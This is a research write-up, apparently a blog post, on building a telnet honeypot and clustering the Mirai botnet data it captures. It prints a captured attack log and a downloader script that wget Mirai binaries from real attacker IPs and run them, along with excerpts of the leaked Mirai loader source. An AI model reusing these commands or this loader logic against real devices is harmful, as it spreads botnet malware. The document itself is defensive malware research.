botnethoneypot

The telnet honeypot research: review and suggestions for application

genshen.ye

Email:master@zomeye.org

Abstract – In this paper, I talk about my research on telnet honeypot. This includes not only skills to build an efficient telnet honeypot but also methodologies to analyse honeypot data.

Index Terms – Telnet Honeypot, IoT Honeypot, Mirai Botnet, Data Analysis, Cluster Analysis

1. Introduction

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. User data is interspersed in-band with Telnet control information in an 8-bit byte oriented data connection over the Transmission Control Protocol (TCP). [1]

While Telnet has been around since 1969 and isn’t as widely used as it once was, there are many embedded system devices such as routers, modems, Network switches, VoIP phones, DVRs, televisions, industrial control systems and others that leverage its remote access capabilities. In fact, a Shodan report [2] shows that there are still over 7.2 million connected devices globally with an accessible port on TCP 23. Figure 1 shows a port trend of my honeypot on TCP 23.

Figure 1. tcp port trends of 23

There are at least 40,000 unique IP addresses launching brute-force attacks against my honeypot on a month basis, and most of these IPs belong to embedded and IoT devices. Figure 2 shows the top 20 most probed ports of my honeypot and telnet protocol brute-force attacks (tcp:23 & tcp:2323) is nearly 27%. So what happened on telnet protocol in the last month? I try to use honeypot to figure it out.

Figure 2. top 20 most probed ports

Honeypot is a computer security mechanism set to detect, deflect, or in some manner, counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data (for example, in a network site) that appears to be a legitimate part of the site, but is actually isolated and monitored, and that seems to contain information or a resource of value to attackers, who are then blocked. This is similar to the police baiting a criminal, conducting undercover surveillance, and finally punishing the criminal. [3]

2. Build an efficient telnet honeypot

There are so many telnet honeypot softwares[4], and it is easy to choose one and deploy a telnet honeypot by default settings. In fact, these honeypots will receive some malware payloads but they are only scraping the surface of possibilities. As far as I can know, most of them are workless by default settings. They may be a low-interaction honeypot, they may simulate a telnet protocol, and they may just support the download method of http. In a word, there is currently no efficient telnet honeypot in public.

Hontel[5] is a Honeypot for Telnet service. Basically, it is a Python v2.x application emulating the service inside the chroot environment. Originally it has been designed to be run inside the Ubuntu environment, though it could be easily adapted to run inside any Linux environment. As far as i know, Hontel project is a good framework for telnet honeypot. It provides the “bash” or “busybox” shell and the attacker can excute any command in chroot environment and get a real return back. But you should be careful to the DDoS attack by the malware running in the hontel honeypot. I have made some improvements based on it and fix some bugs, as shown below.

  • New Features & Improves
    • suitable for mirai and other botnets;
    • command hooking;
    • simulate the IoT devices(random telnet banner, auth);
    • extract more samples from one file;
    • structured data storage based on mysql;
    • web api system for hontel data transmission;
    • cluster analysis in hontel honeypot;
  • Bug Fix

It is recommended that you read the source code of hontel project first before you read any further.
Here is the example of mirai payloads in my hontel honeypot.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[2017-03-27 00:20:35 UTC] [59.185.241.2:54660] AUTH: rootzlxx.:enable
[2017-03-27 00:20:36 UTC] [59.185.241.2:54660] CMD: shell
[2017-03-27 00:20:37 UTC] [59.185.241.2:54660] CMD: sh
[2017-03-27 00:20:38 UTC] [59.185.241.2:54660] CMD: /bin/busybox ECCHI
[2017-03-27 00:20:39 UTC] [59.185.241.2:54660] CMD: /bin/busybox ps; /bin/busybox ECCHI
[2017-03-27 00:20:41 UTC] [59.185.241.2:54660] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
[2017-03-27 00:20:42 UTC] [59.185.241.2:54660] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
[2017-03-27 00:20:43 UTC] [59.185.241.2:54660] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/home/admin' > /home/admin/.nippon; /bin/busybox cat /home/admin/.nippon; /bin/busybox rm /home/admin/.nippon
[2017-03-27 00:20:44 UTC] [59.185.241.2:54660] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
[2017-03-27 00:20:45 UTC] [59.185.241.2:54660] CMD: /bin/busybox ECCHI
[2017-03-27 00:20:46 UTC] [59.185.241.2:54660] CMD: rm /home/admin/.t; rm /home/admin/.sh; rm /home/admin/.human
[2017-03-27 00:20:47 UTC] [59.185.241.2:54660] CMD: cd /home/admin/
[2017-03-27 00:20:49 UTC] [59.185.241.2:54660] CMD: /bin/busybox cp /bin/echo dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2017-03-27 00:20:50 UTC] [59.185.241.2:54660] CMD: /bin/busybox cat /bin/echo
[2017-03-27 00:20:51 UTC] [59.185.241.2:54660] CMD: /bin/busybox ECCHI
[2017-03-27 00:20:52 UTC] [59.185.241.2:54660] CMD: cat /proc/cpuinfo; /bin/busybox ECCHI
[2017-03-27 00:20:53 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
[2017-03-27 00:20:54 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget http://59.185.241.2:80/bins/mirai.arm -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2017-03-27 00:21:21 UTC] [59.185.241.2:54660] CMD: ./dvrHelper telnet.arm; /bin/busybox IHCCE
[2017-03-27 00:21:22 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
[2017-03-27 00:21:23 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget http://59.185.241.2:80/bins/mirai.arm7 -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2017-03-27 00:21:48 UTC] [59.185.241.2:54660] CMD: ./dvrHelper telnet.arm7; /bin/busybox IHCCE
[2017-03-27 00:21:49 UTC] [59.185.241.2:54660] CMD: rm -rf upnp; > dvrHelper; /bin/busybox ECCHI

Mirai (Japanese for “the future”, 未来) is a malware that turns computer systems running Linux into remotely controlled “bots”, that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as remote cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack.[6]

It is import to be suitable for mirai botnet in telnet honeypot, because the current share of mirai payloads in the telnet protocol attacks is nearly 99%. (By the way, Hajime botnet can only attack the fake telnet protocol because of the bug in the telnet scanner.) I have implemented 4 methods in hontel to be suitable for mirai botnet, as shown below.

  1. suitable for bugs in mirai loader;
  2. improve the honeypot filesystem;
  3. command hooking;
  4. extract more samples from one file;

Example 1. auth bugs in mirai loader
There are 4 types of mirai authentication bugs are caught, as shown below.

  1. bug in username&password;
  2. bug in username;
  3. bug in password;
  4. no auth;

loader/src/server.c#L287 (no ‘\r\n’ after username or password)[7]

287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
case TELNET_USER_PROMPT:
consumed = connection_consume_login_prompt(conn);
if (consumed)
{
util_sockprintf(conn->fd, "%s", conn->info.user);
strcpy(conn->output_buffer.data, "\r\n");
conn->output_buffer.deadline = time(NULL) + 1;
conn->state_telnet = TELNET_PASS_PROMPT;
}
break;
case TELNET_PASS_PROMPT:
consumed = connection_consume_password_prompt(conn);
if (consumed)
{
util_sockprintf(conn->fd, "%s", conn->info.pass);
strcpy(conn->output_buffer.data, "\r\n");
conn->output_buffer.deadline = time(NULL) + 1;
conn->state_telnet = TELNET_WAITPASS_PROMPT; // At the very least it will print SOMETHING
}
break;

In the leaked mirai source code, the loader doesn’t send ‘\r\n’ after username or password when login on the telnet device.This is the bug in username&password what looks like “rootxc3511enable:shell”, and the others as shown in figure 3. In my opinion, this is a trap that the author of the leaked mirai source code deliberately sets.By the way, the bad auth is more than 24% in 1.2 million attacks from January 2017 to march in my honeypot. Therefor, it is essential that telnet honeypot should be suitable for mirai auth bugs.

Figure 3. the bug in mirai auth

Example 2. prompt bug in mirai loader
loader/src/connection.c#L213 (“connection_consume_prompt” is defined)[8]

213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
int connection_consume_prompt(struct connection *conn)
{
char *pch;
int i, prompt_ending = -1;

for (i = conn->rdbuf_pos; i >= 0; i--)
{
if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
{
#ifdef DEBUG
printf("matched any prompt at %d, \"%c\", \"%s\"\n", i, conn->rdbuf[i], conn->rdbuf);
#endif
prompt_ending = i;
break;
}
}

if (prompt_ending == -1)
return 0;
else
return prompt_ending;
}


loader/src/server.c#L307 (“connection_consume_prompt” is called)[9]

307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
case TELNET_WAITPASS_PROMPT:
if ((consumed = connection_consume_prompt(conn)) > 0)
{
util_sockprintf(conn->fd, "enable\r\n");
util_sockprintf(conn->fd, "shell\r\n");
util_sockprintf(conn->fd, "sh\r\n");
conn->state_telnet = TELNET_CHECK_LOGIN;
}
break;
case TELNET_CHECK_LOGIN:
if ((consumed = connection_consume_prompt(conn)) > 0)
{
util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_VERIFY_LOGIN;
}
break;

The “connection_consume_promt” function is called in telnet brute-force attack and it will not work when i = 0, prompt_ending = 0 and the connection_consume_promt function return value 0.

Example 3. improve the honeypot filesystem
There are some files should be parepare for mirai and other botnets, as shown below.

│── proc
├── cpuinfo
├── filesystems
├── meminfo
├── modules
├── mounts
├── net
│   └── arp
├── partitions
├── sysrec
├── uptime
├── version
├── vmstat
└── zoneinfo

Feel free to make changes to the content of these files in honeypot. For example, I delete some linux partitions in “/proc/mounts” to increase scan speed of mirai.

It is very cunning that mirai loader detects CPU arch by the elf header of “/bin/echo” and pushes the same CPU arch of bot sample. “/bin/echo” is also used to check writable directories by what return before detecting CPU arch, as shown below.
loader/src/server.c#L360 (detect CPU arch in mirai)[10]

360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
case TELNET_COPY_ECHO:
consumed = connection_consume_copy_op(conn);
if (consumed)
{
#ifdef DEBUG
printf("[FD%d] Finished copying /bin/echo to cwd\n", conn->fd);
#endif
if (!conn->info.has_arch)
{
conn->state_telnet = TELNET_DETECT_ARCH;
conn->timeout = 120;
// DO NOT COMBINE THESE
util_sockprintf(conn->fd, "/bin/busybox cat /bin/echo\r\n");
util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
}
else
{
conn->state_telnet = TELNET_UPLOAD_METHODS;
conn->timeout = 15;
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
}
}
break;
case TELNET_DETECT_ARCH:
consumed = connection_consume_arch(conn);
if (consumed)
{
conn->timeout = 15;
if ((conn->bin = binary_get_by_arch(conn->info.arch)) == NULL)
{
#ifdef DEBUG
printf("[FD%d] Cannot determine architecture\n", conn->fd);
#endif
connection_close(conn);
}
else if (strcmp(conn->info.arch, "arm") == 0)
{
#ifdef DEBUG
printf("[FD%d] Determining ARM sub-type\n", conn->fd);
#endif
util_sockprintf(conn->fd, "cat /proc/cpuinfo; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_ARM_SUBTYPE;
}
else
{
#ifdef DEBUG
printf("[FD%d] Detected architecture: '%s'\n", ev->data.fd, conn->info.arch);
#endif
util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_UPLOAD_METHODS;
}
}
break;

I replace the “cat /bin/echo” command by mirai and return a fake echo file to it. Mirai will detect the ARM arch instead of x86 arch in my honeypot. By the way, it’s the base of command hooking.

Example 4. command hooking
There are 2 methods of command hooking that I have been found.

  1. replace the input command ;
  2. replace the elf file;

I replace the input command such as “./” to the other string and reply a fake return to the attacker.

1
2
3
4
5
6
7
8
if './' in raw:
try:
raw = raw.replace('./','fake_exec')
cmd = cmd.replace('./','fake_exec')
for param in params:
param.replace('./','fake_exec')
except Exception as e:
print e

I replace ‘/bin/rm’ in chroot environment to ‘/bin/rm2’, and the command of rm will not be working.You can add some other hooking rules as you want. By the way, if there are no hooking rules of the specific commands then they are free to excute.

Example 5. extract more samples from bash script
Bash command is often used to download malware, as shown in below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh

# Edit
WEBSERVER="46.166.185.159:80"
# Stop editing now

BINARIES="mirai.arm mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.x86 mirai.spc"

for Binary in $BINARIES; do
wget http://$WEBSERVER/$Binary -O dvrHelper
chmod 777 dvrHelper
./dvrHelper
done

rm -f *

There are also some commands has been used to spread malware:
wget
curl
ftp
tftp
nc
echo

I install these commands in chroot environment and let the bash script be free to excute.

Example 6. extract more samples from one of mirai file
I combine the prefix of mirai with the diffrent CPU arch as a new file, and I get more mirai samples from it. For example, mirai file names as “mirai.arm”, as shown in figure 4. The prefix of this file is “mirai” and the CPU arch is arm, and I can also get “mirai.x86”. Mirai supports for 10 types of CPU arch, and 12 types of mirai prefix I have seen, as shown below.

1
2
Suffix Example: "arm", "arm5n", "arm7", "m68k", "mips", "mpsl", "ppc", "sh4", "spc", "x86"
Prefix Example: "mirai.", "telnetd.", "busybox.", "usb_bus.", "ntpd.", "mm.", "dlr.", "helper.", "masuta.", "miraint.", "gnome.", "tveth."


Figure 4. mirai samples

3. Data analysis in telnet honeypot

1. Structured honeypot data storage for hontel honeypot based on mysql
Translate honeypot data into structure data and store it into mysql database.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
mysql> show tables;
+---------------------------+
| Tables_in_honeypot_hontel |
+---------------------------+
| auth |
| downloads |
| input |
| payload_hash |
| sensors |
| sessions |
| ssdeep_cluster |
| ssdeep_cluster_daily |
+---------------------------+
8 rows in set (0.00 sec)

mysql> desc auth;
+-----------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| timestamp | datetime | YES | MUL | NULL | |
| session | char(32) | YES | | NULL | |
| username | varchar(100) | YES | | NULL | |
| password | varchar(100) | YES | | NULL | |
| success | tinyint(1) | YES | MUL | NULL | |
+-----------+--------------+------+-----+---------+----------------+
6 rows in set (0.01 sec)

mysql> desc downloads;
+-----------+----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+----------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| session | char(32) | YES | MUL | NULL | |
| timestamp | datetime | YES | | NULL | |
| url | text | YES | | NULL | |
| md5 | char(32) | YES | MUL | NULL | |
| sha256 | char(64) | YES | | NULL | |
+-----------+----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)

mysql> desc input;
+-----------+----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+----------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| session | char(32) | YES | MUL | NULL | |
| timestamp | datetime | YES | | NULL | |
| input | text | YES | | NULL | |
+-----------+----------+------+-----+---------+----------------+
4 rows in set (0.00 sec)

mysql> desc sensors;
+---------------+----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+----------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| gmt_create | datetime | YES | | NULL | |
| gmt_modify | datetime | YES | | NULL | |
| sensor_ip | char(16) | YES | | NULL | |
| sensor_port | int(6) | YES | | NULL | |
| restart_count | int(11) | YES | | NULL | |
+---------------+----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)

mysql> desc sessions;
+-----------+----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+----------+------+-----+---------+----------------+
| id | int(32) | NO | PRI | NULL | auto_increment |
| timestamp | datetime | YES | MUL | NULL | |
| session | char(32) | YES | MUL | NULL | |
| starttime | char(30) | YES | | NULL | |
| endtime | char(30) | YES | | NULL | |
| dst_ip | char(16) | YES | | NULL | |
| dst_port | int(6) | YES | | NULL | |
| src_ip | char(16) | YES | | NULL | |
| src_port | int(6) | YES | | NULL | |
| cmd_count | int(11) | YES | | NULL | |
+-----------+----------+------+-----+---------+----------------+
10 rows in set (0.00 sec)


2. Index data in these entities by sessions
Define the total payloads(data request) from a tcp connection of telnet brute-force attack as an attack session and index data in these entities by storing sessions in separate MySQL tables.

Figure 5. Packet exchange for TCP connection.


3. Compute payloads in every session using ssdeep and md5
Ssdeep is a program for computing context triggered piecewise hashes (CTPH). Also called fuzzy hashes, CTPH can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length.[11]

1
2
3
4
5
6
7
8
9
10
11
mysql> desc payload_hash;
+----------------+-----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------------+-----------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| timestamp | datetime | YES | MUL | NULL | |
| session | char(32) | YES | MUL | NULL | |
| payload_md5 | char(32) | YES | | NULL | |
| payload_ssdeep | char(128) | YES | MUL | NULL | |
+----------------+-----------+------+-----+---------+----------------+
5 rows in set (0.00 sec)


4. Web api system for hontel data transmission.
Example:

Method HTTP request Parameters
POST /report_auth session, timestamp, success, username, password
POST /report_download session, timestamp, url, md5, sha256
POST /report_input session, timestamp, input
POST /report_payload_hash session, timestamp, payload_md5, payload_ssdeep
POST /report_sessions session, timestamp, starttime, dst_ip, dst_port, src_ip, src_port
POST /update_sessions session, timestamp, endtime, cmd_count
POST /report_sensors sensor_ip, sensor_port


5. Use ssdc to cluster payload_ssdeep
Ssdc[12] is a command-line tool and clusters files based on their ssDeep hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mysql> desc ssdeep_cluster;
+---------------+-----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+-----------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| timestamp | datetime | NO | | NULL | |
| analysis_date | char(8) | YES | MUL | NULL | |
| ssdeep | char(128) | NO | | NULL | |
| group | int(5) | NO | | NULL | |
| score | int(5) | NO | MUL | NULL | |
+---------------+-----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)

mysql> desc ssdeep_cluster_daily;
+---------------+-----------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+-----------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| timestamp | datetime | NO | | NULL | |
| analysis_date | char(8) | YES | MUL | NULL | |
| ssdeep | char(128) | NO | | NULL | |
| group | int(5) | NO | | NULL | |
| score | int(5) | NO | MUL | NULL | |
+---------------+-----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)


6. Use D3.js to draw force-directed graph in honeypot data
D3.js is a JavaScript library for manipulating documents based on data. [13]

Figure 6. Demo of cluster analysis in hontel.


7. Automatically analysis the Variants of payload in hontel
Every day tens of thousands of sessions come from the attackers, and most of them are belong to the mirai botnet. There are also many variants of mirai and the other botnets. Ssdeep is a good way to compare the difference between two ssdeep hashes. I set a list of ssdeep hashes for the last ssdeep and compare with the latest ssdeep hashes. The similarity of two ssdeep hashes shows the variants of payloads.

4. THE END

I’d like to share my personal ideas based on nearly one year honeypot research and have a further exchange or cooperation with you. Please feel free to concat with me, and my contact details as shown below.

# Github/Twitter: @zom3y3
# Blog: https://blog.findmalware.org
# Email: zom3y3@gmail.com

5. REFERENCES

[1] https://en.wikipedia.org/wiki/Telnet
[2] https://www.shodan.io/report/muH5Gsxg
[3] https://en.wikipedia.org/wiki/Honeypot_(computing)
[4] https://github.com/search?utf8=%E2%9C%93&q=telnet+honeypot&type=
[5] https://github.com/stamparm/hontel
[6] https://en.wikipedia.org/wiki/Mirai_(malware)
[7] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/server.c#L287
[8] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/connection.c#L213
[9] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/server.c#L307
[10] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/server.c#L360
[11] http://ssdeep.sourceforge.net/
[12] https://www.virusbulletin.com/virusbulletin/2015/11/optimizing-ssdeep-use-scale/
[13] https://d3js.org/

Leave a Reply